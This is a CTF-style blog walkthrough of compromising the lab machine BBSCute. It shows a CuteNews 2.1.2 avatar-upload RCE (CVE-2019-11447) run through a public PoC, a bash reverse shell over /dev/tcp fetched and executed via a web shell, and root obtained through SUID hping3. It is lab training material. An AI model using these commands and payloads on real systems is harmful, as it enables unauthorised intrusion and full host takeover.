Proving Grounds - BBSCute Writeup

June 1, 2026

ctf
linux

The target is compromised via Remote Code Execution (RCE) in CuteNews v2.1.2 through a vulnerable avatar upload feature. Privilege escalation is achieved by abusing SUID permissions on /usr/sbin/hping3, enabling root-level command execution.

This is a walkthrough of the machine BBSCute from OffSec's Proving Grounds Play labs.

Machine information:

  • Level: Easy
  • Community rating: Intermediate
  • Flags: 2
  • OS: Linux
  • Vector: Webapp, local

Nmap

sudo nmap -A --open -sV -sC -v -p- <IP>

Starting off with an Nmap scan, we discover the following open ports:

  • 22 - SSH
  • 80/88 - HTTP
  • 110/995 - POP3

Webapp

Enumerating the web application on port 80 using gobuster, we discover the page /index.php.

gobuster dir -u http://<IP>/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -t 64 -x php,txt

Navigating to /index.php, we discover that CuteNews 2.1.2 is running.

Initial access

CuteNews 2.1.2 is vulnerable to CVE-2019-11447, searching for PoCs, we find this GitHub repository.

We clone the Python script and take a closer look:

wget https://raw.githubusercontent.com/thewhiteh4t/cve-2019-11447/refs/heads/main/cve-2019-11447.py

The script requires a username and password, therefore we have to pivot back to the web application and register an account.

Although after trying to register, we run into a problem - a captcha is required, however it is never displayed:

Looking at the page source of /index.php?register, we find a reference to /captcha.php.

We can navigate to /captcha.php, and use the code from this page to register an account.

/captcha.php (for demonstration purposes, captcha is dynamic...)

With a valid account in hand, we will run the exploit again:

python3 CVE-2019-11447.py http://<IP>/index.php <USERNAME> <PASSWORD>

Now, we have a web shell on the target, which we can use to obtain a reverse shell:

  • Create a shell.sh script
#!/bin/bash
bash -i >& /dev/tcp/<IP>/<PORT> 0>&1

  • Start a web server on our attack box
python3 -m http.server 80

  • Use the web shell to download our script
/uploads/avatar_test_4706.php?cmd=wget http://<IP>/shell.sh -O /tmp/shell.sh

  • Start a netcat listener on our attack box
nc -lvnp <PORT>

  • Use the web shell to execute the script
/uploads/avatar_test_4706.php?cmd=bash /tmp/shell.sh

We receive a shell as www-data, and can read the first local.txt flag.

Privilege escalation

Before proceeding, we need to upgrade our shell first, by running:

python3 -c 'import pty;pty.spawn("/bin/bash")'

You will run into issues if you do not follow this step.

Using manual enumeration, looking for executables with the SUID bit set, we find /usr/sbin/hping3:

find / -perm -u=s -type f 2>/dev/null

We can abuse this to escalate privileges by running the following, which provides us with a root shell to finally read the second proof.txt flag:

/usr/sbin/hping3

/bin/sh -p

Related Articles
Hack The Box - Jerry Writeup
June 15, 2026
ctf
windows
An easy-rated Windows box involving default credentials for initial access into Apache Tomcat, and creating an application with a JSP webshell to obtain code execution as SYSTEM.
Hack The Box - Administrator Writeup
June 13, 2026
ctf
windows
active directory
A medium-rated active directory box which involves chaining rights abuses to compromise users, gain access to FTP to discover a Password Safe file and execute a targeted Kerberoast and DCSync attack to compromise the domain.
Hack The Box - Return Writeup
June 13, 2026
ctf
windows
active directory
An easy-rated active directory box involving LDAP and plaintext credentials for initial access, and abusing services to run a malicious image and obtain a SYSTEM shell.
Karam Chatra
Blog
Karam Chatra
Junior Threat Intelligence Analyst
Navigation
HomeBlogDisclaimer
© 2026 Karam Chatra.